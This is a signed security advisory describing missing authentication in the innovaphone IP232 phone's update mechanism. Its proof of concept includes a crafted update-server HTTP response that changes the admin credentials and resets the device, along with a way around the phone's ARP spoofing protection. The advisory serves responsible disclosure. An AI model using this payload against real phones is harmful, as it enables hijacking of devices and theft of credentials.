-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2019-023 Product: innovaphone IP232 Manufacturer: innovaphone AG Affected Version(s): 12r2 sr23 Tested Version(s): 12r2 sr23 Vulnerability Type: Missing Authentication for Critical Function (CWE-306) Risk Level: High Solution Status: Open Manufacturer Notification: 2019-05-16 Solution Date: Public Disclosure: 2019-07-03 CVE Reference: Not yet assigned Author of Advisory: Moritz Abrell (SySS GmbH) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The innovaphone IP232 is a Voice over IP telephone solution, which provides many communication functionalities, for instance, announcement function, password-protected administration via web browser (HTTPS), multiple registration up to six users at the same time and many other features. The manufacturer innovaphone AG describes the product as follows (see [1]): "The IP232 IP phone stands for top quality. It belongs to the innovaphone IP phone design line honoured with the distinguished 'red dot design award: product design'. The IP232 convinces with its modern looks and its technological details. The wideband G.722 audio standard provides optimal voice quality. Standard USB interfaces are perfect for the integration of headsets or extension modules." Due to unauthenticated, unencrypted communication between the VoIP phone IP232 and the update server, an attacker in a man-in-the-middle is able respond to update requests and thus read and change configuration data, also including admin credentials. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The innovapone IP232 phone sends HTTP GET requests within a defined interval to the configured update server (default value = 15 minutes). The update server answers with some configuration lines and other commands to update the device and backup the configuration file. By responding to this request, or routing the request to an attacker-controlled update server, the phone will accept the configuration changes, run the commands, load its own configuration file to the attacker server and installs the attacker's boot code and firmware. The attack also works on similar innovaphone devices. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The phone sends the following HTTP request to the update server: GET /DRIVE/FLASH/update/update.txt?ver=12r2+sr23+IP232%5B12.5560%5D%2C+ Bootcode%5B125560%5D%2C+Hardware%5B1302%5D+ HTTP/1.1 User-Agent: innovaphone-IP232/125560 Host: victim.pbx Connection: close By responding to this HTTP request with some code, the device will apply the changes. An example request for changing the admin credentials to "attacker/supersecret" is as follows: HTTP/1.1 200 OK Date: Mon, 13 May 2019 10:04:41 GMT Server: innovaphone IP0011 / 12r2 sr23 [12.5560/125560/600] Accept-Ranges: bytes Content-Type: text/plain Content-Length: 106 config change CMD0 /user attacker,supersecret config activate config rem CMD0 /user config activate iresetn To answer an HTTP request of a phone, one has to previously establish a man-in-the-middle position, for example via ARP spoofing, DNS spoofing, or DHCP spoofing. The VoIP phone IP232 has a built-in ARP spoofing prevention option. If this feature is enabled, updating the ARP cache will be prevented by the device. However, it is only 'protected' for about 30 seconds. Thus, when isolating the device for this time from the network, it is still possible to spoof MAC addresses. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Currently, there are no manufacturer contemporary plans to patch this security issue. The Manufacturer recommends migrating to major release v13r1, which supports an alternative update mechanism. However, it has to be notice that the vulnerable update mechanism is still active in the default configuration. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2019-05-16: Vulnerability reported to manufacturer 2019-05-23: Reported vulnerabilities again as the vendor did not respond to the first e-mail 2019-06-14: Reported vulnerabilities again as the vendor did not respond to the first e-mails 2019-06-14: Response from manufacturer, that there are no contemporary plans to fix this security issue 2019-07-02: Public disclosure ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product Web Site for innovaphone IP232 https://www.innovaphone.com/en/ip-telefonie/ip-telefone/ip232.html [2] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Moritz Abrell of SySS GmbH. E-Mail: moritz.abrell (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc Key fingerprint = 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAl0cTkUACgkQrgyb+PE0 i1NzIw//dwCffDhwjvCud5+nPhylf9tvqJZr3cNOwwgwJ6lx6QGw5U6OAWPhFzDI A0OVUTLdML5W/cCJ2aI+Tfc706rM0tMrm7nqV/EdIRjGViu0Srh7W19IOa7FeobV Z7cq84gKDslqh2aa6QByFQ8yE+/QOlXbRKWGVFJ3i1QLjop0cx8oIX+C1/JvL+XH wLt2Zryhz9NflYVT+FucxeAO5DJAIc/YyeXjq5sm/nmgAj4ONU6LhZUeaGAsIQE1 +I5A5g6b/SfUnRvvPWbHrzRXq3s77rmk4y5bp90PYpmq2s8csvfP+zv+FKgCe9mk L3t/4bV1M03tyinJRTiXtRmn/2zk+qyW8r/mUGgjaYJXgY+rizrUIlNjKov6TJZY 76MUA+DTSq0+8SM7TLm3NBw6tUh3Qoc82XhKuxeLxsYdnDTgzc0Y7yUoR/fzB9ki UAji7M0BoDXo1IPDId+U8WKGLYLWGFRmjANFIsqMZ9OUx28P77OTAdx3M4KakHaQ 8Vw+5dNMiVuuVeC5Gs7iEBtmk02husb90rjl5cl5mdCfdc742S7/dtePTmiIUgDk MuEYwFm3qOkUKnFJfbeD7WXgOGmj5hOVhZcj3t7MEin70yV1w6Ajuyeka6EF3hw+ alpzgf4ekuG+Z54FczIJx7Tc/Qq5eCO2IZd6gLAm0hJMS0ZA3Y8= =Zaxy -----END PGP SIGNATURE-----